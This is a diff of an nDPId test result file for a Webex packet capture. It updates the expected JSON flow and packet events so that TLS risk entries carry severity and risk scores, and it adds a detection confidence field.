+00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1433,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570713719,"flow_last_seen":1444570715238,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1444570715238,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1454,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570716599,"flow_last_seen":1444570716599,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570716599,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1444570716599,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570716599,"pkt":"ABoRAAACABoRAAABCABFAAA8ldZAAEAGdtEKCAABPm3lnsqRAbsgVHeCAAAAAKACOQiaIAAAAgQFtAQCCAoATOJUAAAAAAEDAwY="}
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1455,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1444570716603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570716603,"pkt":"ABoRAAACABoRAAABCABFAAAoA9FAABAGOOs+beWeCggAAQG7ypHfq4h9IFR3g1AS\/\/+1cAAA"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1456,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1444570716604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570716604,"pkt":"ABoRAAACABoRAAABCABFAAAolddAAEAGduQKCAABPm3lnsqRAbsgVHeD36uIflAQOQh8aQAA"}
-00831{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1457,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570716599,"flow_last_seen":1444570716610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1444570716610,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01211{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1460,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570716599,"flow_last_seen":1444570717923,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"ts_msec":1444570717923,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
+00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1457,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570716599,"flow_last_seen":1444570716610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1444570716610,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1460,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570716599,"flow_last_seen":1444570717923,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"ts_msec":1444570717923,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1483,"source":"webex.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570718801,"flow_last_seen":1444570718801,"flow_idle_time":180000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1444570718801,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51772,"dst_port":9000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1483,"source":"webex.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1444570718801,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":50,"pkt_l4_len":16,"ts_msec":1444570718801,"pkt":"ABoRAAACABoRAAABCABFAAAk4zFAAEARKYMKCAABPm3lnso8IygAEONTAQAAAAAAAAE="}
 00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1484,"source":"webex.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1444570718921,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":50,"pkt_l4_len":16,"ts_msec":1444570718921,"pkt":"ABoRAAACABoRAAABCABFAAAkA95AABARONc+beWeCggAASMoyjwAEESbAgAAAAC4nQE="}
@@ -300,12 +301,12 @@
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1491,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1444570719041,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570719041,"pkt":"ABoRAAACABoRAAABCABFAAA8mB5AAEAGdIkKCAABPm3lnsqTAbu3\/XtaAAAAAKACOQj9rAAAAgQFtAQCCAoATONEAAAAAAEDAwY="}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1444570719047,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570719047,"pkt":"ABoRAAACABoRAAABCABFAAAoA+JAABAGONo+beWeCggAAQG7ypNIAoSlt\/17W1AS\/\/+1bgAA"}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1494,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1444570720045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570720045,"pkt":"ABoRAAACABoRAAABCABFAAAoAABAAEAGDLwKCAABPm3lnsqTAbu3\/XtbAAAAAFAEAACCJAAA"}
-00645{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1516,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1444570637191,"flow_last_seen":1444570728075,"flow_idle_time":180000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":12464,"flow_avg_l4_payload_len":656,"midstream":0,"ts_msec":1444570730075,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.16.1.75","src_port":64538,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00671{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1516,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1444570637191,"flow_last_seen":1444570728075,"flow_idle_time":180000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":12464,"flow_avg_l4_payload_len":656,"midstream":0,"ts_msec":1444570730075,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.16.1.75","src_port":64538,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1527,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570732086,"flow_last_seen":1444570732086,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570732086,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51190,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1527,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1444570732086,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570732086,"pkt":"ABoRAAACABoRAAABCABFAAA8h\/tAAEAGidIKCAABPm3geMf2AbvHvWEvAAAAAKACOQgMSwAAAgQFtAQCCAoATObUAAAAAAEDAwY="}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1528,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1444570732090,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570732090,"pkt":"ABoRAAACABoRAAABCABFAAAoA+tAABAGPfc+beB4CggAAQG7x\/Y4Qp7Qx71hMFAS\/\/+9MQAA"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1531,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1444570733095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570733095,"pkt":"ABoRAAACABoRAAABCABFAAA8h\/xAAEAGidEKCAABPm3geMf2AbvHvWEvAAAAAKACOQgL5wAAAgQFtAQCCAoATOc4AAAAAAEDAwY="}
-00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1536,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570732086,"flow_last_seen":1444570733112,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":7,"midstream":0,"ts_msec":1444570733112,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51190,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1536,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570732086,"flow_last_seen":1444570733112,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":7,"midstream":0,"ts_msec":1444570733112,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51190,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1544,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570738415,"flow_last_seen":1444570738415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570738415,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1544,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1444570738415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570738415,"pkt":"ABoRAAACABoRAAABCABFAAA8pZ5AAEAGbC8KCAABPm3geMf6AbsEHk9CAAAAAKACOQjdywAAAgQFtAQCCAoATOrcAAAAAAEDAwY="}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1545,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1444570738418,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570738418,"pkt":"ABoRAAACABoRAAABCABFAAAoA+9AABAGPfM+beB4CggAAQG7x\/r74bC9BB5PQ1AS\/\/+9LQAA"}
@@ -314,72 +315,72 @@
 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1547,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1444570738422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570738422,"pkt":"ABoRAAACABoRAAABCABFAAAoA\/BAABAGPfI+beB4CggAAQG7x\/s\/nm3KwGGSNlAS\/\/+9LAAA"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1548,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1444570738422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570738422,"pkt":"ABoRAAACABoRAAABCABFAAAopZ9AAEAGbEIKCAABPm3geMf6AbsEHk9D++GwvlAQOQiEJgAA"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1549,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1444570738422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570738422,"pkt":"ABoRAAACABoRAAABCABFAAAoeOpAAEAGmPcKCAABPm3geMf7AbvAYZI2P55ty1AQOQiEJQAA"}
-00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1550,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570738415,"flow_last_seen":1444570738424,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570738424,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1552,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570738419,"flow_last_seen":1444570738426,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570738426,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51195,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01211{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1562,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570738415,"flow_last_seen":1444570740300,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"ts_msec":1444570740300,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
-00638{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1444570699096,"flow_last_seen":1444570740249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1123,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00637{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1444570699101,"flow_last_seen":1444570740248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":497,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":83,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59757,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570637191,"flow_last_seen":1444570733113,"flow_idle_time":180000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":14432,"flow_avg_l4_payload_len":656,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.16.1.75","src_port":64538,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-00728{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1444570636264,"flow_last_seen":1444570640345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4387,"flow_avg_l4_payload_len":292,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
-00729{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636155,"flow_last_seen":1444570639261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":4355,"flow_avg_l4_payload_len":256,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
+00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1550,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570738415,"flow_last_seen":1444570738424,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570738424,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1552,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570738419,"flow_last_seen":1444570738426,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570738426,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51195,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
